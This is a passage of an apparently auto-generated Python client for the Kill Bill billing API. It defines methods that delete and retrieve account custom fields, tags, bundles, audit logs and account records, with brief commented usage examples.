query_params.append(('customField', params['custom_field'])) # noqa: E501
collection_formats['customField'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
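# Minimal usage sketch for delete_account_custom_fields (assumes `api` is an
# instance of this class built on a configured ApiClient; the UUIDs are
# placeholders). Each entry of `custom_field` is serialized as a repeated
# `customField` query parameter because of the 'multi' collection format above.
#
#   api.delete_account_custom_fields(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       created_by='tech-editor',
#       custom_field=['d7b5b4a2-8b7c-4f4e-9f3a-1d2c3b4a5e6f'],
#       comment='remove stale field')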
def delete_account_tags(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove tags from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_tags(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] tag_def:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_account_tags_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.delete_account_tags_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def delete_account_tags_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove tags from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_tags_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] tag_def:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'tag_def', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_tags`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `delete_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `delete_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'tag_def' in params:
query_params.append(('tagDef', params['tag_def'])) # noqa: E501
collection_formats['tagDef'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
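# Minimal usage sketch for get_account (placeholder UUID; the audit level
# string is an assumption about accepted server values):
#
#   account = api.get_account(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       account_with_balance=True,
#       account_with_balance_and_cba=True,
#       audit='MINIMAL')
#
# The two booleans are sent as the accountWithBalance and
# accountWithBalanceAndCBA query parameters, and the response body is
# deserialized into an Account model.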
def get_account_audit_logs(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve audit logs by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_audit_logs_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_audit_logs_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_audit_logs_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve audit logs by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_audit_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_audit_logs`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_audit_logs`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/auditLogs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_audit_logs_with_history(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account audit logs with history by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_history(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_audit_logs_with_history_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_audit_logs_with_history_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_audit_logs_with_history_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account audit logs with history by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_history_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_audit_logs_with_history`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_bundles(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve bundles for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_bundles(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str external_key:
:param Str bundles_filter:
:param Str audit:
:return: List[Bundle]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_bundles_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_bundles_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_bundles_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve bundles for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_bundles_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str external_key:
:param Str bundles_filter:
:param Str audit:
:return: List[Bundle]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'external_key', 'bundles_filter', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_bundles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_bundles`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_bundles`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'bundles_filter' in params:
query_params.append(('bundlesFilter', params['bundles_filter'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/bundles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Bundle]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
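# Usage sketch for get_account_bundles (placeholder values): external_key and
# bundles_filter are optional query parameters, so the call below only returns
# bundles matching the given external key.
#
#   bundles = api.get_account_bundles(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       external_key='my-bundle-key')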
def get_account_by_key(self, external_key=None, **kwargs): # noqa: E501
"""Retrieve an account by external key # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_by_key(external_key, async=True)
>>> result = thread.get()
:param async bool
:param Str external_key: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_by_key_with_http_info(external_key, **kwargs) # noqa: E501
else:
(data) = self.get_account_by_key_with_http_info(external_key, **kwargs) # noqa: E501
return data
def get_account_by_key_with_http_info(self, external_key=None, **kwargs): # noqa: E501
"""Retrieve an account by external key # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_by_key_with_http_info(external_key, async=True)
>>> result = thread.get()
:param async bool
:param Str external_key: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['external_key', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_by_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'external_key' is set
if ('external_key' not in params or
params['external_key'] is None):
raise ValueError("Missing the required parameter `external_key` when calling `get_account_by_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
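# Unlike get_account, this lookup takes no path parameter: the key is sent as
# the externalKey query parameter against /1.0/kb/accounts. Usage sketch
# (placeholder key):
#
#   account = api.get_account_by_key(external_key='my-account-key')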
def get_account_custom_fields(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account custom fields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_custom_fields(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_custom_fields_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account custom fields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_custom_fields_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_email_audit_logs_with_history(self, account_id=None, account_email_id=None, **kwargs): # noqa: E501
"""Retrieve account email audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_email_audit_logs_with_history(account_id, account_email_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str account_email_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, **kwargs) # noqa: E501
return data
def get_account_email_audit_logs_with_history_with_http_info(self, account_id=None, account_email_id=None, **kwargs): # noqa: E501
"""Retrieve account email audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str account_email_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_email_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_email_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_email_audit_logs_with_history`") # noqa: E501
# verify the required parameter 'account_email_id' is set
if ('account_email_id' not in params or
params['account_email_id'] is None):
raise ValueError("Missing the required parameter `account_email_id` when calling `get_account_email_audit_logs_with_history`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_email_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
if 'account_email_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_email_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_email_id` when calling `get_account_email_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'account_email_id' in params:
path_params['accountEmailId'] = params['account_email_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails/{accountEmailId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
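# This operation needs two path parameters, and both IDs must match the
# UUID-like pattern validated above. Usage sketch (placeholder UUIDs):
#
#   logs = api.get_account_email_audit_logs_with_history(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       account_email_id='0e8f9b1c-2d3e-4f5a-8b7c-9d0e1f2a3b4c')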
def get_account_tags(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_tags(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_tags_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_tags_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_tags_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_tags_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'included_deleted', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
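# Usage sketch for get_account_tags (placeholder UUID): included_deleted=True
# also returns tags that have since been removed from the account.
#
#   tags = api.get_account_tags(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       included_deleted=True)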
def get_account_timeline(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account timeline # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_timeline(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool parallel:
:param Str audit:
:return: AccountTimeline
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_timeline_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_timeline_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_timeline_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account timeline # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_timeline_with_http_info(account_id, async=True)
>>> result = thread.get()
